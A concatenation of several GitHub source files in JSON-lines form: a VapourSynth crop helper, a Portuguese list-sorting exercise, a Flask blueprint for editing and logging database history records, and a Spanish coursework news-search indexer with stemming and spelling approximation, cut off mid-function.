vs\nfrom vapoursynth import core\n\ndef rekt(src, fix, left=0, top=0, right=0, bottom=0):\n '''Creates a rectangular \"mask\" for a fix to be applied to.'''\n\n if left > 0 or right > 0:\n m = core.std.Crop(fix, left=left, right=right)\n l = core.std.Crop(src, right=src.width - left) if left > 0 else 0\n r = core.std.Crop(src, left=src.width - right) if right > 0 else 0\n params = [x for x in [l, m, r] if x != 0]\n m = core.std.StackHorizontal(params)\n else:\n m = fix\n if top > 0 or bottom > 0:\n t = core.std.Crop(src, bottom=src.height - top) if top > 0 else 0\n m = core.std.Crop(m, bottom=bottom, top=top)\n b = core.std.Crop(src, top=src.height - bottom) if bottom > 0 else 0\n params = [x for x in [t, m, b] if x != 0]\n m = core.std.StackVertical(params)\n return m\n","repo_name":"Selur/VapoursynthScriptsInHybrid","sub_path":"rekt.py","file_name":"rekt.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"52"} +{"seq_id":"21455255593","text":"# 1) Receba numeros inteiros do usuario e armazene-os em uma lista. Crie uma condição para o numero 0 finalizar o processo de preenchimento. Após isso, imprima o maior valor da lista utilizando as funções sorted() e len(). Por fim, utilize reversed() para inverter a lista e obtenha, pelo indice, o valor intermediario da mesma.\n#obs - Caso o numero de valores da lista seja par, pegue a media dos dois valores centrais\n\n\n#minha resolução\n\n\nlista = []\nnum = 1\nwhile num != 0:\n num = int(input('Digite um ou mais Numeros : '))\n if num != 0:\n lista.append(num)\n\nprint(f'Lista: {lista}')\n\nordenada = sorted(lista)\nprint(f'Lista ordenada: {ordenada}')\nmaiorElementoUsandoLen = ordenada[len(lista) - 1]\nprint(f'O maior elemento da lista {ordenada} é {maiorElementoUsandoLen}')\n\nreversa = reversed(ordenada)\nlistaReversa = list(reversa)\n\nprint(f'Lista ordenada Reversa: {listaReversa}')\n\nif (len(listaReversa) + 1 ) % 2 == 0:\n indice = (len(listaReversa ) + 1) // 2\n elementoDoMeio = listaReversa[indice - 1]\n print(f'O elemento do meio é : {elementoDoMeio}')\n \nelif (len(listaReversa) + 1 ) % 2 != 0:\n indiceOrdenada = (len(ordenada) + 1 ) // 2 \n indiceReversa = (len(listaReversa) + 1) // 2\n print(f'Numero do meio na lista Ordenada : {ordenada[indiceOrdenada - 1]}')\n print(f'Numero do meio lista reversa : {listaReversa[indiceReversa - 1]}')\n media = ordenada[indiceOrdenada - 1] + listaReversa[indiceReversa - 1] // 2\n print(f'A media dos dois numeros do meio é : {media}')\n \n \n \n# resolução professor\n\nnumeroInt = 1\nlistaNumeros = []\n\nwhile numeroInt != 0:\n numeroInt = int(input('Digite um numero inteiro: '))\n if numeroInt != 0:\n listaNumeros.append(numeroInt)\n\nordenada = sorted(listaNumeros)\ntamanho = len(listaNumeros)\n\nprint(f'Maior valor: {ordenada[tamanho - 1]}')\n\ninvertida = reversed(ordenada)\nlistaInvertida = list(invertida)\n\nif tamanho % 2 == 1:\n print(f'Valor intermediario: {listaInvertida[tamanho // 2]}')\nelse:\n print(f'Media dos valores intermediarios: {(listaInvertida[tamanho // 2] + listaInvertida[(tamanho//2) -1 ]) // 2} ')\n \n","repo_name":"castrintt/curso-python","sub_path":"funcoes-aplicaveis/exercicio-sorted-reversed.py","file_name":"exercicio-sorted-reversed.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"44212332787","text":"# 作者 :gw\r\n# 创建日期 :2019-07-04 下午 16:25\r\n# 文件名 :鸡鸭分类.py\r\nimport sys\r\n\r\na = sys.stdin.readline().strip()\r\n\r\nres = 0\r\nl = 0\r\nfor i in range(len(a)):\r\n if a[i] == 'C':\r\n res = res + i - l\r\n l = l + 1\r\nprint(res)","repo_name":"1325075688gw/argorm","sub_path":"鸡鸭分类.py","file_name":"鸡鸭分类.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74662668963","text":"from flask import Blueprint, render_template, jsonify, request\nfrom flask_login import login_required, current_user\nfrom models import (db, HistoryTable, Siila1Table, Siila2Table, Siila3Table, \n RegionTable, MarketTable, CadastreTable, ContactTable, IndustryTable)\nfrom utils import get_menu_context\nfrom datetime import datetime\nfrom models.logs_table import LogsTable\nfrom sqlalchemy import cast, String, join\n\nhistory_bp = Blueprint('history_table', __name__)\n\n@history_bp.route('/history_table')\n@login_required\ndef history_table():\n current_table, tables = get_menu_context('History Table')\n market_names = [row.MARKET_NAME for row in db.session.query(MarketTable.MARKET_NAME).distinct()]\n return render_template('group1/history_table.html', tables=tables, current_table=current_table, market_names=market_names)\n\n@history_bp.route('/get_history_data')\n@login_required\ndef get_history_data():\n property_type = request.args.get('propertyType')\n market_name = request.args.get('marketName')\n\n # Join necessary tables to retrieve all fields\n history_data = db.session.query(\n HistoryTable.SIILA1_ID,\n HistoryTable.ID_UNIQUE,\n Siila1Table.SIILA1_NAME,\n Siila2Table.SIILA2_NAME,\n Siila3Table.SIILA3_NAME,\n RegionTable.REGION_NAME,\n HistoryTable.PERIOD,\n CadastreTable.CADASTRE_NAME.label(\"OWNER_NAME\"),\n CadastreTable.CAD_GROUP.label(\"OWNER_GROUP\"),\n ContactTable.CONTACT_NAME.label(\"CONTACT_NAME\"),\n ContactTable.CONTACT_PHONE.label(\"CONTACT_PHONE\"),\n ContactTable.CONTACT_EMAIL.label(\"CONTACT_EMAIL\")\n ).join(\n Siila1Table, HistoryTable.SIILA1_ID == Siila1Table.SIILA1_ID\n ).join(\n RegionTable, Siila1Table.REGION_ID == RegionTable.REGION_ID\n ).join(\n MarketTable, RegionTable.MARKET_ID == MarketTable.MARKET_ID\n ).join(\n Siila2Table, HistoryTable.SIILA2_ID == Siila2Table.SIILA2_ID\n ).join(\n Siila3Table, HistoryTable.SIILA3_ID == Siila3Table.SIILA3_ID\n ).join(\n CadastreTable, HistoryTable.ID_OWNER == CadastreTable.CADASTRE_ID\n ).join(\n ContactTable, HistoryTable.ID_CONT_OWNER == ContactTable.CONTACT_ID\n ).filter(\n Siila1Table.PROPERTY_TYPE == property_type,\n MarketTable.MARKET_NAME == market_name\n ).all()\n\n # Convert the data to a list of dictionaries to be sent as JSON\n history_data = [{\n 'SIILA1_ID': row.SIILA1_ID,\n 'ID_UNIQUE': row.ID_UNIQUE,\n 'SIILA1_NAME': row.SIILA1_NAME,\n 'SIILA2_NAME': row.SIILA2_NAME,\n 'SIILA3_NAME': row.SIILA3_NAME,\n 'REGION_NAME': row.REGION_NAME,\n 'PERIOD': row.PERIOD,\n 'OWNER_NAME': row.OWNER_NAME,\n 'OWNER_GROUP': row.OWNER_GROUP,\n 'CONTACT_NAME': row.CONTACT_NAME,\n 'CONTACT_PHONE': row.CONTACT_PHONE,\n 'CONTACT_EMAIL': row.CONTACT_EMAIL\n } for row in history_data]\n\n return jsonify(history_data)\n\n@history_bp.route('/update_history_table', methods=['POST'])\n@login_required\ndef update_history_table():\n try:\n # Extract data from form\n table_id = request.form.get('table_id')\n column_name = request.form.get('column_name')\n new_value = request.form.get('new_value')\n user = current_user.username\n\n # Get the old value before updating\n old_value = db.session.query(HistoryTable).filter(HistoryTable.HISTORY_ID == table_id).first().__getattribute__(column_name)\n\n # Perform the update operation\n db.session.query(HistoryTable).filter(HistoryTable.HISTORY_ID == table_id).update({column_name: new_value})\n\n # Log the update operation\n log = LogsTable(\n table_name='History Table', \n variable_name=column_name, \n table_id=table_id, \n old_value=old_value, \n new_value=new_value, \n user=user, \n date_update=datetime.now(), \n update_type=\"Update\"\n )\n db.session.add(log)\n\n # Commit the changes\n db.session.commit()\n\n return jsonify(success=True)\n except Exception as e:\n # Log the exception for debugging\n print(str(e))\n return jsonify(success=False, message=\"An unexpected error occurred.\")\n\n@history_bp.route('/get_data_from_table')\n@login_required\ndef get_data_from_table():\n table_type = request.args.get('table')\n \n if table_type == \"cadastre_table\":\n # Join the CadastreTable with IndustryTable\n data = db.session.query(CadastreTable, IndustryTable).join(\n IndustryTable, CadastreTable.INDUSTRY_ID == IndustryTable.INDUSTRY_ID\n ).all()\n\n # Return the CADASTRE_NAME, CADASTRE_ID, INDUSTRY_NAME and CAD_GROUP\n return jsonify([\n {\n \"CADASTRE_ID\": row.CadastreTable.CADASTRE_ID, # added CADASTRE_ID\n \"CADASTRE_NAME\": row.CadastreTable.CADASTRE_NAME,\n \"CAD_GROUP\": row.CadastreTable.CAD_GROUP,\n \"INDUSTRY_NAME\": row.IndustryTable.INDUSTRY_NAME\n }\n for row in data\n ])\n elif table_type == \"contact_table\":\n data = db.session.query(ContactTable).all()\n return jsonify([\n {\n \"CONTACT_ID\": row.CONTACT_ID, # added CONTACT_ID\n \"CONTACT_NAME\": row.CONTACT_NAME,\n \"CONTACT_EMAIL\": row.CONTACT_EMAIL,\n \"CONTACT_PHONE\": row.CONTACT_PHONE\n }\n for row in data\n ])\n else:\n return jsonify([])\n\n@history_bp.route('/update_original_table', methods=['POST'])\n@login_required\ndef update_original_table():\n try:\n table_type = request.form.get('tableType')\n selected_id = request.form.get('selectedId')\n history_id = request.form.get('ID_UNIQUE') # Fetch ID_UNIQUE from the request\n \n # Determine the column to update based on the table type\n column_to_update = \"ID_OWNER\" if table_type == \"cadastre_table\" else \"ID_CONT_OWNER\"\n \n # Fetch the old value before updating\n old_value = db.session.query(HistoryTable).filter(HistoryTable.ID_UNIQUE == history_id).first().__getattribute__(column_to_update)\n \n # Update the original table's data using the selected row's ID\n db.session.query(HistoryTable).filter(HistoryTable.ID_UNIQUE == history_id).update({column_to_update: selected_id})\n \n # Determine the name of the table being updated for logging purposes\n if table_type == \"cadastre_table\":\n table_name = \"Cadastre Table\"\n else:\n table_name = \"Contact Table\"\n\n # Log the update operation\n user = current_user.username\n log = LogsTable(\n table_name=table_name,\n variable_name=column_to_update,\n table_id=history_id,\n old_value=str(old_value),\n new_value=str(selected_id),\n user=user,\n date_update=datetime.now(),\n update_type=\"Update\"\n )\n db.session.add(log)\n \n # Commit the changes\n db.session.commit()\n \n return jsonify(success=True)\n except Exception as e:\n print(str(e))\n return jsonify(success=False, message=\"An unexpected error occurred.\")\n","repo_name":"LucaSiila/CRUD---WEBAPP","sub_path":"blueprints/history_table.py","file_name":"history_table.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74836766565","text":"#coding: utf-8\nimport json\nfrom pickle import FALSE\nfrom nltk.stem.snowball import SnowballStemmer\nimport os\nimport re\n\n#Algoritmica\nfrom spellsuggest import SpellSuggester \nfrom spellsuggest import TrieSpellSuggester\n\n\nclass SAR_Project:\n \"\"\"\n Prototipo de la clase para realizar la indexacion y la recuperacion de noticias\n \n Preparada para todas las ampliaciones:\n parentesis + multiples indices + posicionales + stemming + permuterm + ranking de resultado\n\n Se deben completar los metodos que se indica.\n Se pueden añadir nuevas variables y nuevos metodos\n Los metodos que se añadan se deberan documentar en el codigo y explicar en la memoria\n \"\"\"\n\n # lista de campos, el booleano indica si se debe tokenizar el campo\n # NECESARIO PARA LA AMPLIACION MULTIFIELD\n fields = [(\"title\", True), (\"date\", False),\n (\"keywords\", True), (\"article\", True),\n (\"summary\", True)]\n \n \n # numero maximo de documento a mostrar cuando self.show_all es False\n SHOW_MAX = 100\n\n\n def __init__(self):\n \"\"\"\n Constructor de la classe SAR_Indexer.\n NECESARIO PARA LA VERSION MINIMA\n\n Incluye todas las variables necesaria para todas las ampliaciones.\n Puedes añadir más variables si las necesitas \n\n \"\"\"\n self.index = {} # hash para el indice invertido de terminos --> clave: termino, valor: posting list.\n # Si se hace la implementacion multifield, se pude hacer un segundo nivel de hashing de tal forma que:\n # self.index['title'] seria el indice invertido del campo 'title'.\n self.stemmindex = {} # hash para el índice invertido de stems --> clave: stem, valor: posting list.\n self.sindex = {} # hash para el indice invertido de stems --> clave: stem, valor: lista con los terminos que tienen ese stem\n self.ptindex = {} # hash para el indice permuterm.\n self.docs = {} # diccionario de documentos --> clave: entero(docid), valor: ruta del fichero.\n self.weight = {} # hash de terminos para el pesado, ranking de resultados. puede no utilizarse\n self.news = {} # hash de noticias --> clave entero (newid), valor: la info necesaria para diferenciar la noticia dentro de su fichero (doc_id y posición dentro del documento)\n self.tokenizer = re.compile(\"\\W+\") # expresion regular para hacer la tokenizacion\n self.stemmer = SnowballStemmer('spanish') # stemmer en castellano\n self.show_all = False # valor por defecto, se cambia con self.set_showall()\n self.show_snippet = False # valor por defecto, se cambia con self.set_snippet()\n self.use_stemming = False # valor por defecto, se cambia con self.set_stemming()\n self.use_ranking = False # valor por defecto, se cambia con self.set_ranking()\n self.tam_not = {} # hash que indica el tamaño en tokens de cada noticia, clave: termino, noticia: num_tokens\n\n #Variable añadida en Algoritmica\n self.use_approximation = False # indica si se usará aproximación de terminos por distancias, se cambia con self.set_approximation()\n\n self.IdDoc = 0 # numero de documento (archivo .json)\n self.newid = 0 # numero de noticia\n \n ###############################\n ### ###\n ### CONFIGURACION ###\n ### ###\n ###############################\n\n\n def set_showall(self, v):\n \"\"\"\n\n Cambia el modo de mostrar los resultados.\n \n input: \"v\" booleano.\n\n UTIL PARA TODAS LAS VERSIONES\n\n si self.show_all es True se mostraran todos los resultados el lugar de un maximo de self.SHOW_MAX, no aplicable a la opcion -C\n\n \"\"\"\n self.show_all = v\n\n\n def set_snippet(self, v):\n \"\"\"\n\n Cambia el modo de mostrar snippet.\n \n input: \"v\" booleano.\n\n UTIL PARA TODAS LAS VERSIONES\n\n si self.show_snippet es True se mostrara un snippet de cada noticia, no aplicable a la opcion -C\n\n \"\"\"\n self.show_snippet = v\n\n\n def set_stemming(self, v):\n \"\"\"\n\n Cambia el modo de stemming por defecto.\n \n input: \"v\" booleano.\n\n UTIL PARA LA VERSION CON STEMMING\n\n si self.use_stemming es True las consultas se resolveran aplicando stemming por defecto.\n\n \"\"\"\n self.use_stemming = v\n\n\n def set_ranking(self, v):\n \"\"\"\n\n Cambia el modo de ranking por defecto.\n \n input: \"v\" booleano.\n\n UTIL PARA LA VERSION CON RANKING DE NOTICIAS\n\n si self.use_ranking es True las consultas se mostraran ordenadas, no aplicable a la opcion -C\n\n \"\"\"\n self.use_ranking = v\n\n #AGREGADO EN ALGORITMICA\n def set_approximation(self, v, distance, threshold):\n \"\"\"\n Activa o desactiva la aproximación de términos\n \n input: \"v\" booleano.\n \"distance\" algoritmo de distancia entre cadenas a usar (string)\n \"threshold\" distancia máxima a considerar entre cadenas (int)\n\n si self.use_approximation es True los términos de las consultas podrán aproximarse a otros similares\n por algoritmos de distancia si no se encuentran resultados de esos términos\n\n \"\"\"\n self.use_approximation = v\n self.approximation_distance = distance\n self.approximation_threshold = threshold\n\n\n ###############################\n ### ###\n ### PARTE 1: INDEXACION ###\n ### ###\n ###############################\n\n\n def index_dir(self, root, **args):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n \n Recorre recursivamente el directorio \"root\" e indexa su contenido\n los argumentos adicionales \"**args\" solo son necesarios para las funcionalidades ampliadas\n\n \"\"\"\n\n self.multifield = args['multifield']\n self.positional = args['positional']\n self.stemming = args['stem']\n self.permuterm = args['permuterm']\n self.approximation = args['approximation'] #Añadido en algoritmica\n self.use_trie = args['trie'] #Añadido en algoritmica\n\n for dir, subdirs, files in os.walk(root):\n for filename in files:\n if filename.endswith('.json'):\n fullname = os.path.join(dir, filename)\n self.index_file(fullname)\n \n if self.stemming is True:\n self.make_stemming()\n self.make_inverted_stems()\n \n #Algoritmica\n if self.approximation is True:\n if self.multifield is True:\n if self.use_trie:\n self.spellsuggester = TrieSpellSuggester(vocab=self.index['article'].keys())\n else:\n self.spellsuggester = SpellSuggester(vocab=self.index['article'].keys())\n else:\n if self.use_trie:\n self.spellsuggester = TrieSpellSuggester(vocab=self.index.keys())\n else:\n self.spellsuggester = SpellSuggester(vocab=self.index.keys())\n\n ##########################################\n ## COMPLETAR PARA FUNCIONALIDADES EXTRA ##\n ##########################################\n \n\n def index_file(self, filename):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Indexa el contenido de un fichero.\n\n Para tokenizar la noticia se debe llamar a \"self.tokenize\"\n\n Dependiendo del valor de \"self.multifield\" y \"self.positional\" se debe ampliar el indexado.\n En estos casos, se recomienda crear nuevos metodos para hacer mas sencilla la implementacion\n\n input: \"filename\" es el nombre de un fichero en formato JSON Arrays (https://www.w3schools.com/js/js_json_arrays.asp).\n Una vez parseado con json.load tendremos una lista de diccionarios, cada diccionario se corresponde a una noticia\n\n \"\"\"\n IdNot = 0\n\n with open(filename) as fh:\n jlist = json.load(fh)\n self.docs[self.IdDoc]=filename\n \n\n for n in jlist: #Para cada noticia del documento\n if self.multifield is True: #Multifield está activado, coger resto de campos\n for tupla in self.fields:\n (campo,tokenizar) = tupla\n\n content = n[campo]\n self.tam_not.setdefault(campo,{})\n self.tam_not[campo].setdefault(self.newid,len(content))\n \n\n if tokenizar is True:\n self.index.setdefault(campo,{})\n tokens = self.tokenize(content) #Tokenizamos los términos\n if self.positional is True: #Creamos el indice posicional\n self.make_positionals(tokens,campo)\n else:\n for tt in tokens:\n self.index[campo].setdefault(tt,[])\n #Comprobamos que el termino no se repite\n if self.newid not in self.index[campo][tt]:\n self.index[campo].setdefault(tt,[]).append(self.newid)\n else:\n self.index.setdefault(campo,{})\n self.index[campo].setdefault(content,[])\n if self.newid not in self.index[campo][content]:\n self.index[campo][content].append(self.newid)\n\n else:\n content = n['article']\n\n self.tam_not.setdefault(self.newid,len(content))\n\n tokens = self.tokenize(content) #Tokenizamos los términos\n if self.positional is True:\n self.make_positionals(tokens)\n else:\n for tt in tokens:\n self.index.setdefault(tt,[])\n if self.newid not in self.index[tt]:\n excluidos = {\"title\",\"date\",\"keywords\",\"summary\"}\n if tt not in excluidos:\n self.index.setdefault(tt,[]).append(self.newid)\n\n\n\n self.news.setdefault(self.newid,[]).append((self.IdDoc,IdNot)) #Para cada noticia, indica el documento al que pertenece y su posición en el mismo\n self.newid += 1\n IdNot += 1\n self.IdDoc += 1 \n \n\n #################\n ### COMPLETAR ###\n #################\n\n\n\n def tokenize(self, text):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Tokeniza la cadena \"texto\" eliminando simbolos no alfanumericos y dividiendola por espacios.\n Puedes utilizar la expresion regular 'self.tokenizer'.\n\n params: 'text': texto a tokenizar\n\n return: lista de tokens\n\n \"\"\"\n return self.tokenizer.sub(' ', text.lower()).split()\n\n\n\n def make_positionals(self, tokens, campo='article'):\n \"\"\"\n Crea los posicionales de los tokens dentro de cada id de noticia\n\n \"\"\"\n contador = 0\n \n if self.multifield is True:\n for tt in tokens: \n self.index[campo].setdefault(tt,{}).setdefault(self.newid,[])\n if contador not in self.index[campo][tt][self.newid]:\n #Agregamos el id de noticia en el que aparece el token\n\n self.index[campo][tt][self.newid].append(contador)\n contador += 1 \n else:\n for tt in tokens: \n self.index.setdefault(tt,{}).setdefault(self.newid,[])\n if contador not in self.index[tt][self.newid]:\n #Agregamos el id de noticia en el que aparece el token\n\n self.index[tt][self.newid].append(contador)\n contador += 1 \n\n \n\n\n def make_stemming(self):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE STEMMING.\n\n Crea el indice de stemming (self.stemmindex) para los terminos de todos los indices.\n\n self.stemmer.stem(token) devuelve el stem del token\n\n \"\"\"\n if self.multifield is True:\n for campo in self.index:\n if campo != \"date\":\n self.stemmindex.setdefault(campo,{})\n for token in self.index[campo]:\n stem = self.stemmer.stem(token)\n self.stemmindex[campo].setdefault(stem,[])\n for idnot in self.index[campo][token]: #Va copiando el reverse posting del token al stem\n if idnot not in self.stemmindex[campo][stem]:\n self.stemmindex[campo][stem].append(idnot)\n\n self.stemmindex[campo][stem].sort()\n\n else:\n self.stemmindex.setdefault(campo,{})\n self.stemmindex[campo] = self.index[campo]\n else:\n for token in self.index:\n stem = self.stemmer.stem(token)\n self.stemmindex.setdefault(stem,[])\n for idnot in self.index[token]: #Va copiando el reverse posting del token al stem\n if idnot not in self.stemmindex[stem]:\n self.stemmindex[stem].append(idnot)\n\n self.stemmindex[stem].sort()\n\n\n\n\n ####################################################\n ## COMPLETAR PARA FUNCIONALIDAD EXTRA DE STEMMING ##\n ####################################################\n\n\n\n def make_inverted_stems(self):\n \"\"\"\n Crea un diccionario (self.sindex) para relacionar los stems son sus términos´\n\n \"\"\"\n \n if self.multifield is True:\n for campo in self.index:\n if campo != 'date':\n for term in self.index[campo]:\n stem = self.stemmer.stem(term)\n self.sindex.setdefault(stem,[])\n if term not in self.sindex[stem]:\n self.sindex[stem].append(term)\n else:\n for term in self.index[campo]:\n self.sindex.setdefault(term,term)\n else:\n for term in self.index:\n stem = self.stemmer.stem(term)\n self.sindex.setdefault(stem,[])\n if term not in self.sindex[stem]:\n self.sindex[stem].append(term)\n\n\n \n def make_permuterm(self):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE PERMUTERM\n\n Crea el indice permuterm (self.ptindex) para los terminos de todos los indices.\n\n \"\"\"\n pass\n ####################################################\n ## COMPLETAR PARA FUNCIONALIDAD EXTRA DE STEMMING ##\n ####################################################\n\n\n\n\n def show_stats(self):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n \n Muestra estadisticas de los indices\n \n \"\"\"\n \n ########################################\n ## COMPLETAR PARA TODAS LAS VERSIONES ##\n ########################################\n print(\"========================\")\n if self.multifield:\n print(\"Number of indexed days: %d\" % len(self.index[\"date\"]))\n print(\"-------------------------\")\n print(\"Number of indexed news: %d\" % len(self.news))\n print(\"-------------------------\")\n print(\"TOKENS\")\n\n for t in self.index:\n print(\"#of tokens in %s: %d\" % (t, len(self.index[t])))\n print(\"-------------------------\")\n print(\"PERMUTERMS\")\n for p in self.ptindex:\n print(\"#of permuterms in %s: %d\" % (p, len(self.ptindex[p])))\n print(\"-------------------------\")\n print(\"STEMS\")\n for s in self.stemmindex:\n print(\"#of stems in %s: %d\" % (s, len(self.stemmindex[s])))\n print(\"-------------------------\")\n post = \" \"\n if self.positional == []:\n post=\" NOT \"\n print(\"Positional queries are%sallowed\" % (post))\n\n\n\n\n\n\n ###################################\n ### ###\n ### PARTE 2.1: RECUPERACION ###\n ### ###\n ###################################\n\n\n def solve_query(self, query, prev={}):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Resuelve una query.\n Debe realizar el parsing de consulta que sera mas o menos complicado en funcion de la ampliacion que se implementen\n\n\n param: \"query\": cadena con la query\n \"prev\": incluido por si se quiere hacer una version recursiva. No es necesario utilizarlo.\n\n\n return: posting list con el resultado de la query\n\n \"\"\"\n posts = {}\n operadores = []\n if query is None or len(query) == 0:\n return []\n i = 0\n \n \n \n lista_query = re.split(\" +(AND|OR) +\",query)\n for term in lista_query:\n if term not in ['AND','OR']:\n \n \n if term.find('NOT ') == 0: #Es un NOT\n string = term.split(' ')[1]\n aux = string.split(\":\")\n if len(aux) > 1:\n string = aux[1]\n campo = aux[0]\n else:\n campo = \"article\"\n if string.find('\"') == 0: #Positional\n string = string[1:len(string) - 1]\n posts[i] = self.reverse_posting(self.get_positionals(string, campo)) #Calculamos el \"NOT posicional\"\n else:\n posts[i] = self.reverse_posting(self.get_posting(string, campo)) #Calculamos el \"NOT term\"\n i+=1\n else:\n campo = \"article\"\n aux = term.split(\":\")\n if len(aux) > 1:\n term = aux[1]\n campo = aux[0]\n if term.find('\"') == 0: #Positional\n term = term[1:len(term) - 1]\n posts[i] = self.get_positionals(term, campo) #Calculamos el posting posicional\n else:\n posts[i] = self.get_posting(term,campo) #Calculamos la posting list del term\n i+=1\n else:\n operadores.append(term)\n i = 0\n for op in operadores:\n if op == 'AND':\n posts[i+1] = self.and_posting(posts[i],posts[i+1])\n i+=1\n else: #Es un OR\n posts[i+1] = self.or_posting(posts[i],posts[i+1])\n i+=1\n \n return posts[i]\n ########################################\n ## COMPLETAR PARA TODAS LAS VERSIONES ##\n ########################################\n\n \n\n def get_posting(self, term, field='article', positional=False):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Devuelve la posting list asociada a un termino. \n Dependiendo de las ampliaciones implementadas \"get_posting\" puede llamar a:\n - self.get_positionals: para la ampliacion de posicionales\n - self.get_permuterm: para la ampliacion de permuterms\n - self.get_stemming: para la amplaicion de stemming\n\n\n param: \"term\": termino del que se debe recuperar la posting list.\n \"field\": campo sobre el que se debe recuperar la posting list, solo necesario si se hace la ampliacion de multiples indices\n\n return: posting list\n\n \"\"\"\n ########################################\n ## COMPLETAR PARA TODAS LAS VERSIONES ##\n ########################################\n res = []\n term = term.lower()\n if self.positional is True:\n if self.multifield is True:\n #Usamos positionals y multifield\n if self.use_stemming is True and positional is False:\n res = self.get_stemming(term, field)\n else:\n if field == 'date':\n if self.index[field].get(term) is not None:\n res = self.index[field].get(term)\n else:\n res = []\n else:\n if term in list(self.index[field].keys()):\n if list(self.index[field][term].keys()) is not None:\n res = list(self.index[field][term].keys())\n else:\n res = []\n else: res = []\n else: #No usamos multifield pero sí positionals\n if self.use_stemming is True:\n res = self.get_stemming(term)\n else:\n if self.index.get(term) is not None:\n res = list(self.index[term].keys())\n else:\n res = []\n\n else: #No usamos positionals\n if self.multifield is True:\n if self.use_stemming is True:\n res = self.get_stemming(term, field)\n else:\n if self.index[field].get(term) is not None:\n res = self.index[field].get(term)\n else:\n res = []\n else:\n if self.use_stemming is True:\n res = self.get_stemming(term)\n else:\n if self.index.get(term) is not None:\n res = self.index.get(term)\n else:\n res = []\n\n\n #Algoritmica\n if self.use_approximation is True and res == []:\n if self.positional:\n if self.stemming is False:\n if self.multifield is True:\n lista = self.spellsuggester.suggest(term, self.approximation_distance,\n threshold=self.approximation_threshold)\n for palabra in lista:\n res = self.or_posting(res, list(self.index[field][palabra].keys()))\n else:\n lista = self.spellsuggester.suggest(term, self.approximation_distance,\n self.approximation_threshold)\n for palabra in lista:\n res = self.or_posting(res, list(self.index[palabra].keys()))\n else:\n if self.stemming is False:\n if self.multifield is True:\n lista = self.spellsuggester.suggest(term, self.approximation_distance, threshold=self.approximation_threshold)\n for palabra in lista:\n res = self.or_posting(res, self.index[field][palabra])\n else:\n lista = self.spellsuggester.suggest(term, self.approximation_distance , self.approximation_threshold)\n for palabra in lista:\n res = self.or_posting(res,self.index[palabra])\n \n return res\n\n\n def get_positionals(self, terms, field='article'):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE POSICIONALES\n\n Devuelve la posting list asociada a una secuencia de terminos consecutivos.\n\n param: \"terms\": lista con los terminos consecutivos para recuperar la posting list.\n \"field\": campo sobre el que se debe recuperar la posting list, solo necesario se se hace la ampliacion de multiples indices\n\n return: posting list\n\n \"\"\"\n res = []\n postings = [] #Contendrá las noticias en las que aparecen todos los términos\n lista_terms = terms.split(' ')\n \n for term in lista_terms:\n postings.append(self.get_posting(term,field,True))\n\n i=0\n while i < len(lista_terms)-1:\n postings[i+1] = self.and_posting(postings[i],postings[i+1])\n i+=1\n\n\n \"\"\"\n Para cada noticia:\n Coger las posiciones de cada termino i y poner en pos[i]\n Hacer un AND entre pos[0] y pos[i] restando i a cada elemento (por la diferencia en posicion por palabras)\n\n\n \"\"\"\n\n if postings[i] is not None and not self.use_approximation:\n for noticia in postings[i]:\n pos = []\n for term in lista_terms:\n if self.multifield is True:\n pos.append(list(self.index[field][term][noticia]))\n else:\n pos.append(self.index[term][noticia])\n j=0\n while j < len(pos):\n pos[j] = [x-j for x in pos[j]]\n j+=1\n j=0\n while j < len(pos)-1:\n pos[j+1] = self.and_posting(pos[j],pos[j+1])\n j+=1\n if len(pos[j]) != 0:\n res.append(noticia)\n elif postings[i] is not None:\n res.extend(postings[i])\n\n if res is None:\n return []\n else:\n return res\n ########################################################\n ## COMPLETAR PARA FUNCIONALIDAD EXTRA DE POSICIONALES ##\n ########################################################\n\n\n def get_stemming(self, term, field='article'):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE STEMMING\n\n Devuelve la posting list asociada al stem de un termino.\n\n param: \"term\": termino para recuperar la posting list de su stem.\n \"field\": campo sobre el que se debe recuperar la posting list, solo necesario se se hace la ampliacion de multiples indices\n\n return: posting list\n\n \"\"\"\n if self.stemming is False:\n print(\"Stemming Desactivado\")\n exit()\n\n if self.multifield is True:\n stem = self.stemmer.stem(term)\n if field == \"date\":\n return self.stemmindex[field].get(stem)\n else:\n if self.stemmindex[field].get(stem) is not None:\n return self.stemmindex[field].get(stem)\n else:\n res = []\n else:\n stem = self.stemmer.stem(term)\n if self.stemmindex.get(stem) is not None:\n return self.stemmindex.get(stem)\n else:\n res = []\n\n\n def get_permuterm(self, term, field='article'):\n \"\"\"\n NECESARIO PARA LA AMPLIACION DE PERMUTERM\n\n Devuelve la posting list asociada a un termino utilizando el indice permuterm.\n\n param: \"term\": termino para recuperar la posting list, \"term\" incluye un comodin (* o ?).\n \"field\": campo sobre el que se debe recuperar la posting list, solo necesario se se hace la ampliacion de multiples indices\n\n return: posting list\n\n \"\"\"\n\n ##################################################\n ## COMPLETAR PARA FUNCIONALIDAD EXTRA PERMUTERM ##\n ##################################################\n\n\n\n\n def reverse_posting(self, p):\n \"\"\"\n NECESARIO PARA TODAS LAS VERSIONES\n\n Devuelve una posting list con todas las noticias excepto las contenidas en p.\n Util para resolver las queries con NOT.\n\n\n param: \"p\": posting list\n\n\n return: posting list con todos los newid exceptos los contenidos en p\n\n \"\"\"\n \n posting = [] \n i = 0\n while ((i < len(self.news))):\n if i not in p:\n posting.append(i)\n i +=1\n\n return posting\n\n\n def and_posting(self, p1, p2):\n \"\"\"\n NECESARIO PARA 